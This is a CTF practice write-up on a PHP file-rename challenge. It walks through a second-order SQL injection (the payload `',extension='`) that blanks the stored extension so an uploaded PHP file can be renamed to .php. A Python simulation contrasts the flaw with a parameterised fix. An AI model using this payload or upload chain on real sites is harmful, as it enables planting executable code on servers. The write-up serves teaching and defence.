NSS daily practice
tag: update injection, second-order injection
At first glance it looks like a file upload challenge.
upload.php
```php
<?php
require_once "common.inc.php";
if (isset($req['oldname']) && isset($req['newname'])) {
    $result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
    if ($result->num_rows > 0) {
        $result = $result->fetch_assoc();
    } else {
        exit("old file doesn't exists!");
    }
    if ($result) {
        $req['newname'] = basename($req['newname']);
        $re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
        if (!$re) {
            print_r($db->error);
            exit;
        }
        $oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
        $newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
        if (file_exists($oldname)) {
            rename($oldname, $newname);
        }
        $url = "/" . $newname;
        echo "Your file is rename, url:
<a href=\"{$url}\" target='_blank'>{$url}</a><br/>
<a href=\"/\">go back</a>";
    }
}
?>
```
DB statements:

```php
$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
```

Looks up, in the `file` table, the row whose `filename` column matches the given file name.

```php
$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
```

Updates the row: `filename` comes from the request, while `oldname` is filled from the `filename` previously stored in the table, so a value read back from the database goes into the query without any escaping (this is the second-order injection point). The file on disk is then renamed:

```php
$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
```

There is a guard against changing the suffix: only the file name changes, the extension is appended from the stored row.
Tried it; you only get: 2.php.png
xdctf.sql
```sql
SET NAMES utf8;
SET FOREIGN_KEY_CHECKS = 0;
DROP DATABASE IF EXISTS `xdctf`;
CREATE DATABASE xdctf;
USE xdctf;
DROP TABLE IF EXISTS `file`;
CREATE TABLE `file` (
  `fid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `filename` varchar(256) NOT NULL,
  `oldname` varchar(256) DEFAULT NULL,
  `view` int(11) DEFAULT NULL,
  `extension` varchar(32) DEFAULT NULL,
  PRIMARY KEY (`fid`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
SET FOREIGN_KEY_CHECKS = 1;
```
Only the file name can be changed, but with SQL injection we can blank out `extension`, and then add the `.php` suffix ourselves when renaming the file.
Injection that leaves `extension` empty:
`',extension='.txt`
Enter `',extension='`, then rename it to test.txt.
SQL state afterwards:

| filename | extension |
| --- | --- |
| NULL | NULL |
| test.txt | NULL |
Upload a PHP file renamed to .txt as a disguise.
Then rename it to .php: because the extension is now empty, the app treats the file extension as empty and turns test.txt into test.php + NULL.
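To make the second-order point concrete, here is an added simulation (not the challenge's code) of upload.php's rename logic on an in-memory SQLite table, replaying the three renames above against the page's query builder and against a parameterised version that keeps the extension intact. It assumes common.inc.php escapes the request values (the page does not show it); the `shell` upload, the `test` name and the SQLite quote-doubling escape are constructed stand-ins.

```python
import os
import sqlite3

# Constructed stand-in for the xdctf `file` table from the page (SQLite instead of MySQL).
SCHEMA = """CREATE TABLE file (
    fid INTEGER PRIMARY KEY AUTOINCREMENT, filename TEXT NOT NULL,
    oldname TEXT, view INTEGER, extension TEXT)"""


def escape(s):
    # Assumed stand-in for the escaping common.inc.php applies to $req (quote doubling,
    # because SQLite does not treat backslash as an escape the way MySQL does).
    return s.replace("'", "''")


def rename_vulnerable(conn, oldname, newname):
    """Mirrors upload.php: the request value is escaped, but $result['filename'] is not."""
    row = conn.execute(f"select * from file where filename='{escape(oldname)}'").fetchone()
    if row is None:
        raise LookupError("old file doesn't exists!")
    newname = os.path.basename(newname)  # basename() only strips directory parts
    # row['filename'] was read back from the database and is interpolated raw: second-order injection
    conn.execute(f"update file set filename='{escape(newname)}', "
                 f"oldname='{row['filename']}' where fid={row['fid']}")
    # on-disk target, built as upload.php does from the extension read BEFORE the update
    return newname + (row["extension"] or "")


def rename_fixed(conn, oldname, newname):
    """Same logic with both values bound as parameters; a stored name can no longer inject."""
    row = conn.execute("select * from file where filename=?", (oldname,)).fetchone()
    if row is None:
        raise LookupError("old file doesn't exists!")
    newname = os.path.basename(newname)
    conn.execute("update file set filename=?, oldname=? where fid=?",
                 (newname, row["filename"], row["fid"]))
    return newname + (row["extension"] or "")


def run_chain(rename):
    """Replays the page's three renames; returns (extension column, on-disk name) at the end."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(SCHEMA)
    conn.execute("insert into file (filename, extension) values ('shell', '.txt')")  # constructed upload
    rename(conn, "shell", "',extension='")   # 1: the payload is stored as the filename
    rename(conn, "',extension='", "test")    # 2: the stored filename lands in the UPDATE
    disk = rename(conn, "test", "test.php")  # 3: the suffix comes from the extension column
    ext = conn.execute("select extension from file where filename='test.php'").fetchone()[0]
    return ext, disk


if __name__ == "__main__":
    print(run_chain(rename_vulnerable))  # ('', 'test.php')
    print(run_chain(rename_fixed))       # ('.txt', 'test.php.txt')
```

The second `rename` call is where the stored `',extension='` rewrites the UPDATE, which is why escaping only `$req` is not enough and both values have to be bound.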